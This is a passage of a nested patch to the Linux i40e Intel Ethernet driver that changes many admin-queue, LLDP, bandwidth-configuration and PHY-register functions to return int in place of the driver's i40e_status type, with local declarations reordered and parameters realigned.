+ 	struct i40e_aqc_nvm_update *cmd;
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_nvm_update *)&desc.params.raw;
+ 
+@@ -3613,17 +3471,17 @@ i40e_aq_rearrange_nvm_exit:
+  *
+  * Requests the complete LLDP MIB (entire packet).
+  **/
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_get_mib *cmd =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+ 	struct i40e_aqc_lldp_get_mib *resp =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3663,14 +3521,14 @@ i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+  *
+  * Set the LLDP MIB.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_lldp_set_local_mib *cmd;
+-	enum i40e_status_code status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_lldp_set_local_mib *)&desc.params.raw;
+ 	if (buff_size == 0 || !buff)
+@@ -3702,14 +3560,14 @@ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+  * Enable or Disable posting of an event on ARQ when LLDP MIB
+  * associated with the interface changes
+  **/
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_update_mib *cmd =
+ 		(struct i40e_aqc_lldp_update_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_update_mib);
+ 
+@@ -3731,14 +3589,14 @@ i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+  * Restore LLDP Agent factory settings if @restore set to True. In other case
+  * only returns factory setting in AQ response.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_restore *cmd =
+ 		(struct i40e_aqc_lldp_restore *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_PERSISTENT)) {
+ 		i40e_debug(hw, I40E_DEBUG_ALL,
+@@ -3768,14 +3626,14 @@ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+  *
+  * Stop or Shutdown the embedded LLDP Agent
+  **/
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-				bool persist,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_stop *cmd =
+ 		(struct i40e_aqc_lldp_stop *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_stop);
+ 
+@@ -3803,13 +3661,13 @@ i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+  *
+  * Start the embedded LLDP Agent on all ports.
+  **/
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_start *cmd =
+ 		(struct i40e_aqc_lldp_start *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_start);
+ 
+@@ -3835,14 +3693,14 @@ i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+  * @dcb_enable: True if DCB configuration needs to be applied
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+ 			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_dcb_parameters *cmd =
+ 		(struct i40e_aqc_set_dcb_parameters *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_STOPPABLE))
+ 		return I40E_ERR_DEVICE_NOT_SUPPORTED;
+@@ -3868,12 +3726,12 @@ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+  *
+  * Get CEE DCBX mode operational configuration from firmware
+  **/
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3899,17 +3757,17 @@ i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+  * and this function will call cpu_to_le16 to convert from Host byte order to
+  * Little Endian order.
+  **/
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_udp_tunnel *cmd =
+ 		(struct i40e_aqc_add_udp_tunnel *)&desc.params.raw;
+ 	struct i40e_aqc_del_udp_tunnel_completion *resp =
+ 		(struct i40e_aqc_del_udp_tunnel_completion *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_add_udp_tunnel);
+ 
+@@ -3930,13 +3788,13 @@ i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+  * @index: filter index
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_remove_udp_tunnel *cmd =
+ 		(struct i40e_aqc_remove_udp_tunnel *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_del_udp_tunnel);
+ 
+@@ -3955,13 +3813,13 @@ i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+  *
+  * This deletes a switch element from the switch.
+  **/
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *cmd =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -3985,11 +3843,11 @@ i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+  * recomputed and modified. The retval field in the descriptor
+  * will be set to 0 when RPB is modified.
+  **/
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
++			struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_dcb_updated);
+ 
+@@ -4009,15 +3867,15 @@ i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+  *
+  * Generic command handler for Tx scheduler AQ commands
+  **/
+-static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
++static int i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+ 				void *buff, u16 buff_size,
+-				 enum i40e_admin_queue_opc opcode,
++				enum i40e_admin_queue_opc opcode,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_tx_sched_ind *cmd =
+ 		(struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	bool cmd_param_flag = false;
+ 
+ 	switch (opcode) {
+@@ -4067,14 +3925,14 @@ static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+  * @max_credit: Max BW limit credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_configure_vsi_bw_limit *cmd =
+ 		(struct i40e_aqc_configure_vsi_bw_limit *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_vsi_bw_limit);
+@@ -4095,10 +3953,10 @@ i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
++			     u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_configure_vsi_tc_bw,
+@@ -4113,11 +3971,12 @@ i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+  * @opcode: Tx scheduler AQ command opcode
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)ets_data,
+ 				    sizeof(*ets_data), opcode, cmd_details);
+@@ -4130,7 +3989,8 @@ i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative/absolute TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int
++i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details)
+@@ -4147,10 +4007,11 @@ i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_bw_config,
+@@ -4164,10 +4025,11 @@ i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration per TC
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_ets_sla_config,
+@@ -4181,10 +4043,11 @@ i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's per TC BW config
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				   i40e_aqc_opc_query_switching_comp_ets_config,
+@@ -4198,10 +4061,11 @@ i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold current ETS configuration for the Physical Port
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_port_ets_config,
+@@ -4215,10 +4079,11 @@ i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_switching_comp_bw_config,
+@@ -4237,8 +4102,9 @@ i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+  * Returns 0 if the values passed are valid and within
+  * range else returns an error.
+  **/
+-static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++static int
++i40e_validate_filter_settings(struct i40e_hw *hw,
++			      struct i40e_filter_control_settings *settings)
+ {
+ 	u32 fcoe_cntx_size, fcoe_filt_size;
+ 	u32 fcoe_fmax;
+@@ -4324,11 +4190,11 @@ static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+  * for a single PF. It is expected that these settings are programmed
+  * at the driver initialization time.
+  **/
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings)
+ {
+-	i40e_status ret = 0;
+ 	u32 hash_lut_size = 0;
++	int ret = 0;
+ 	u32 val;
+ 
+ 	if (!settings)
+@@ -4398,11 +4264,11 @@ i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+  * In return it will update the total number of perfect filter count in
+  * the stats member.
+  **/
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_control_packet_filter *cmd =
+@@ -4411,7 +4277,7 @@ i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_remove_control_packet_filter_completion *resp =
+ 		(struct i40e_aqc_add_remove_control_packet_filter_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (vsi_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4457,7 +4323,7 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_DROP |
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_TX;
+ 	u16 ethtype = I40E_FLOW_CONTROL_ETHTYPE;
+-	i40e_status status;
++	int status;
+ 
+ 	status = i40e_aq_add_rem_control_packet_filter(hw, NULL, ethtype, flag,
+ 						       seid, 0, true, NULL,
+@@ -4479,14 +4345,14 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+  * is not passed then only register at 'reg_addr0' is read.
+  *
+  **/
+-static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+-					  u32 reg_addr0, u32 *reg_val0,
+-					  u32 reg_addr1, u32 *reg_val1)
++static int i40e_aq_alternate_read(struct i40e_hw *hw,
++				  u32 reg_addr0, u32 *reg_val0,
++				  u32 reg_addr1, u32 *reg_val1)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_alternate_write *cmd_resp =
+ 		(struct i40e_aqc_alternate_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val0)
+ 		return I40E_ERR_PARAM;
+@@ -4515,12 +4381,12 @@ static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+  *
+  * Suspend port's Tx traffic
+  **/
+-i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_tx_sched_ind *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_suspend_port_tx);
+@@ -4537,11 +4403,11 @@ i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+  *
+  * Resume port's Tx traffic
+  **/
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_resume_port_tx);
+ 
+@@ -4611,18 +4477,18 @@ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status)
+  * Dump internal FW/HW data for debug purposes.
+  *
+  **/
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_dump_internals *cmd =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+ 	struct i40e_aqc_debug_dump_internals *resp =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -4663,12 +4529,12 @@ i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+  *
+  * Read bw from the alternate ram for the given pf
+  **/
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw,
+-				      bool *min_valid, bool *max_valid)
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw,
++			      bool *min_valid, bool *max_valid)
+ {
+-	i40e_status status;
+ 	u32 max_bw_addr, min_bw_addr;
++	int status;
+ 
+ 	/* Calculate the address of the min/max bw registers */
+ 	max_bw_addr = I40E_ALT_STRUCT_FIRST_PF_OFFSET +
+@@ -4703,13 +4569,14 @@ i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+  *
+  * Configure partitions guaranteed/max bw
+  **/
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+-	struct i40e_aq_desc desc;
+ 	u16 bwd_size = sizeof(*bw_data);
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_partition_bw);
+@@ -4738,11 +4605,11 @@ i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4783,11 +4650,11 @@ i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Writes specified PHY register value
+  **/
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command  = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4824,13 +4691,13 @@ i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
++	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+-	u8 port_num = hw->func_caps.mdio_port_num;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4898,13 +4765,13 @@ phy_read_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+-	u32 command = 0;
+-	u16 retry = 1000;
+ 	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
++	u16 retry = 1000;
++	u32 command = 0;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4965,10 +4832,10 @@ phy_write_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+-				    u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register(struct i40e_hw *hw,
++			    u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5004,10 +4871,10 @@ i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw,
+-				   u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register(struct i40e_hw *hw,
++			   u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5056,17 +4923,17 @@ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num)
+  *
+  * Blinks PHY link LED
+  **/
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval)
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval)
+ {
+-	i40e_status status = 0;
+-	u32 i;
+-	u16 led_ctl;
+-	u16 gpio_led_port;
+-	u16 led_reg;
+ 	u16 led_addr = I40E_PHY_LED_PROV_REG_1;
++	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
++	int status = 0;
++	u16 led_ctl;
+ 	u8 port_num;
++	u16 led_reg;
++	u32 i;
+ 
+ 	i = rd32(hw, I40E_PFGEN_PORTNUM);
+ 	port_num = (u8)(i & I40E_PFGEN_PORTNUM_PORT_NUM_MASK);
+@@ -5128,12 +4995,12 @@ phy_blinking_end:
+  * @led_addr: LED register address
+  * @reg_val: read register value
+  **/
+-static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 *reg_val)
++static int i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 *reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	*reg_val = 0;
